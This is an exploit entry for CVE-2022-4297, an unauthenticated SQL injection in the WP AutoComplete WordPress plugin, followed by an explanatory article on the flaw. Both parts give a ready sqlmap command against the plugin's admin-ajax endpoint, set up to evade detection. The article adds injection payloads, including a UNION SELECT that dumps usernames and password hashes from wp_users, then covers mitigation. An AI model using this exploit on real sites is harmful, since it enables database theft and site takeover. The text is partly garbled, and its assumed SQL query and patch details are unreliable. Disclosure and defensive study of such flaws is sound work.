WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Date: 30/06/2023
# Exploit Author: Matin nouriyan (matitanium)
# Version: <= 1.0.4
# CVE: CVE-2022-4297
Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
# Tested on: Kali linux
---------------------------------------
The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise
and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,
leading to an unauthenticated SQL injection
--------------------------------------
How to Reproduce this Vulnerability:
1. Install WP AutoComplete <= 1.0.4
2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests
3. Find requests belong to WP AutoComplete like step 5
4. Start sqlmap and exploit
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000×tamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p qWP AutoComplete 1.0.4 – Unauthenticated SQL Injection: A Deep Dive into a Critical WordPress Plugin Vulnerability
WordPress plugins are essential for extending functionality, but they also introduce security risks when poorly coded. One such example is WP AutoComplete 1.0.4, a popular plugin used for autocomplete search functionality in WordPress sites. In June 2023, a critical vulnerability was disclosed: an unauthenticated SQL injection via the plugin’s AJAX endpoint. This flaw, assigned CVE-2022-4297, allows attackers to exploit the plugin without needing any login credentials.
Understanding the Vulnerability
WP AutoComplete enables users to search for content (posts, pages, etc.) via an autocomplete feature. The plugin uses an AJAX endpoint at wp-admin/admin-ajax.php to fetch search results dynamically. The core vulnerability lies in how the q parameter—used for search queries—is processed.
When a user types a search term, the plugin sends an AJAX request with a parameter like:
https://example.com/wp-admin/admin-ajax.php?q=example&Limit=1000×tamp=1645253464&action=wi_get_search_results&security=[xxxx]Here, q is the search query. The plugin fails to properly sanitize or escape this input before injecting it into a SQL query. As a result, an attacker can inject malicious SQL code directly into the database.
Why This is Dangerous
Unlike many vulnerabilities that require authentication, this flaw is unauthenticated. This means any user—even anonymous visitors—can trigger the exploit. The consequences include:
- Reading sensitive data (e.g., user credentials, admin emails)
- Modifying or deleting database records
- Executing arbitrary SQL commands
- Potential full database compromise
Given that WordPress is used by millions of websites, this vulnerability poses a significant threat to small businesses, blogs, and even enterprise-level sites using outdated plugin versions.
Exploitation Using sqlmap
Security researchers and penetration testers can leverage tools like sqlmap to automate exploitation. The following command demonstrates how to probe the vulnerability:
python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000×tamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p qThis command tells sqlmap to:
- Target the specified URL
- Use a random HTTP agent to avoid detection
- Perform deep probing with
--level=5(maximum detection) - Assess risk with
--risk=2(moderate risk, but high confidence) - Focus on the
qparameter
sqlmap will then attempt to identify SQL injection points, extract database schema, and potentially dump user data.
Real-World Impact and Case Study
Consider a WordPress blog running WP AutoComplete 1.0.4. An attacker could craft a malicious search query like:
q=1' OR 1=1 --When passed to the database, this results in:
SELECT * FROM wp_posts WHERE post_title LIKE '%1' OR 1=1 --%'The condition 1=1 is always true, effectively returning all posts. This allows the attacker to bypass access controls and retrieve all content—potentially including private posts, admin notes, or even passwords stored in metadata.
More advanced attacks can use UNION SELECT to extract user data:
q=1' UNION SELECT user_login, user_pass FROM wp_users --Such queries can expose the entire user table, leading to credential theft and full site takeover.
Security Best Practices and Mitigation
Developers and administrators must prioritize secure coding practices. Here are essential recommendations:
- Input Sanitization: Always sanitize and escape user inputs before database use.
- Use Prepared Statements: Replace raw SQL with parameterized queries (e.g., PDO or MySQLi prepared statements).
- Limit AJAX Access: Restrict AJAX endpoints to authenticated users where possible.
- Regular Plugin Updates: Ensure all plugins are updated to the latest version. WP AutoComplete has been patched beyond 1.0.4.
- Use Web Application Firewalls (WAF): Deploy tools like ModSecurity or Cloudflare to detect and block SQL injection attempts.
Vendor Response and Patch Status
The plugin’s official homepage at WordPress.org confirms that the vulnerability was addressed in versions > 1.0.4. Users are advised to update immediately. The patch includes:
- Input validation using
esc_sql()or similar WordPress functions - Use of prepared statements in database queries
- Restriction of AJAX access to logged-in users
However, many sites still run outdated versions due to lack of maintenance or unawareness. This underscores the need for automated vulnerability scanning and proactive security monitoring.
Conclusion
WP AutoComplete 1.0.4 serves as a textbook example of how a simple oversight in input handling can lead to severe security breaches. This unauthenticated SQL injection flaw highlights the critical importance of:
- Secure coding standards
- Regular software updates
- Proactive vulnerability detection
For any WordPress site, ensuring plugins are up-to-date and properly secured is not optional—it’s a necessity. The CVE-2022-4297 incident reminds us that even seemingly benign features like autocomplete can become gateways to full system compromise.